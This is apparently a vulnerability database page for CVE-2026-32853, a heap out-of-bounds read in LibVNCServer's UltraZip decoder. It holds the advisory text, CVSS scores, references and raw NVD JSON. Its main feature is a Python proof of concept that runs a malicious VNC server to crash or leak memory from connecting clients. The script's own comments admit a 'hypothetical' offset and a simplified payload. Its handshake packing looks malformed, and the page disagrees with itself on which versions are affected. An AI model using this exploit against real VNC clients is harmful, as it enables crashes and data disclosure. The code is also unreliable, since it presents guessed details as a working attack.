CVE-2026-32853

Description

LibVNCServer versions 0.9.15 and prior (fixed in commit 009008e) contain a heap out-of-bounds read vulnerability in the UltraZip encoding handler that allows a malicious VNC server to cause information disclosure or application crash. Attackers can exploit improper bounds checking in the HandleUltraZipBPP() function by manipulating subrectangle header counts to read beyond the allocated heap buffer.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:libvncserver_project:libvncserver:*:*:*:*:*:*:*:* - VULNERABLE

LibVNCServer <= 0.9.15

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket
import struct

# Proof of Concept for CVE-2026-32853
# This script acts as a malicious VNC server triggering the heap out-of-bounds read.

def send_vnc_handshake(sock):
    # Protocol Version handshake
    sock.send(b"RFB 003.008\n")
    sock.recv(12)  # Receive client version

    # Security types: None (1)
    sock.send(b"\x01\x01")
    sock.recv(1)   # Client security selection

    # SecurityResult: OK (0)
    sock.send(b"\x00\x00\x00\x00")
    sock.recv(1)   # ClientInit Shared flag

    # ServerInit: Fake dimensions and name
    framebuffer_width = 1024
    framebuffer_height = 768
    server_name = b"Exploit"
    msg = struct.pack("!HH16s", framebuffer_width, framebuffer_height, b"\x00" * 12) + struct.pack("!I", len(server_name)) + server_name
    sock.send(msg)

def send_malicious_ultrazip(sock):
    # FramebufferUpdate message
    sock.send(b"\x00\x00\x00\x01")  # Message type 0, padding
    
    # Rectangle header
    x, y = 0, 0
    w, h = 100, 100
    encoding = 16  # UltraZip encoding
    rect_header = struct.pack("!HHHHi", x, y, w, h, encoding)
    sock.send(rect_header)
    
    # Malicious UltraZip data
    # The vulnerability is triggered by manipulating subrectangle counts
    # causing HandleUltraZipBPP to read beyond the heap buffer.
    
    # Construct a payload with a high subrect count
    # Format: [Tile Header]... [Subrect Data]
    
    # Simplified payload structure demonstrating the trigger
    # In a real exploit, this would be carefully crafted to match the heap layout
    payload = b"\x00" * 24  # Minimal header
    
    # Manipulate the subrect count (hypothetical offset in the structure)
    # Setting a large number to force out-of-bounds read
    payload += struct.pack("!I", 0xFFFFFFFF) 
    
    sock.send(payload)

def run_exploit(ip, port):
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((ip, port))
    server.listen(1)
    print(f"[*] Listening on {ip}:{port}...")
    
    client, addr = server.accept()
    print(f"[*] Connection from {addr}")
    
    try:
        send_vnc_handshake(client)
        print("[*] Handshake complete.")
        
        # Trigger the vulnerability
        send_malicious_ultrazip(client)
        print("[*] Malicious UltraZip payload sent.")
        
    except Exception as e:
        print(f"[!] Error: {e}")
    finally:
        client.close()
        server.close()

if __name__ == "__main__":
    run_exploit("0.0.0.0", 5900)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32853
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32853
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32853/
[4] VulDB https://vuldb.com/cve/CVE-2026-32853
[5] https://github.com/LibVNC/libvncserver/commit/009008e2f4d5a54dd71f422070df3af7b3dbc931
[6] https://github.com/LibVNC/libvncserver/security/advisories/GHSA-87q7-v983-qwcj
[7] https://www.vulncheck.com/advisories/libvncserver-ultrazip-encoding-heap-out-of-bounds-read
[8] https://github.com/LibVNC/libvncserver/security/advisories/GHSA-87q7-v983-qwcj

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32853", "sourceIdentifier": "[email protected]", "published": "2026-03-24T18:16:09.253", "lastModified": "2026-03-25T20:48:30.733", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LibVNCServer versions 0.9.15 and prior (fixed in commit 009008e) contain a heap out-of-bounds read vulnerability in the UltraZip encoding handler that allows a malicious VNC server to cause information disclosure or application crash. Attackers can exploit improper bounds checking in the HandleUltraZipBPP() function by manipulating subrectangle header counts to read beyond the allocated heap buffer."}, {"lang": "es", "value": "Las versiones 0.9.15 y anteriores de LibVNCServer (corregido en el commit 009008e) contienen una vulnerabilidad de lectura fuera de límites de la pila en el gestor de codificación UltraZip que permite a un servidor VNC malicioso causar revelación de información o un fallo de la aplicación. Los atacantes pueden explotar la comprobación de límites incorrecta en la función HandleUltraZipBPP() manipulando los recuentos de encabezados de subrectángulos para leer más allá del búfer de pila asignado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libvncserver_project:libvncserver:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.9.15", "matchCriteriaId": "A73C0099-80A6-4B55-8B34-7968BFADE90A"}]}]}], "references": [{"url": "https://github.com/LibVNC/libvncserver/commit/009008e2f4d5a54dd71f422070df3af7b3dbc931", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/LibVNC/libvncserver/security/advisories/GHSA-87q7-v983-qwcj", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/libvncserver-ultrazip-encoding-heap-out-of-bounds-read", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/LibVNC/libvncserver/security/advisories/GHSA-87q7-v983-qwcj", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Vendor Advisory"]}]}}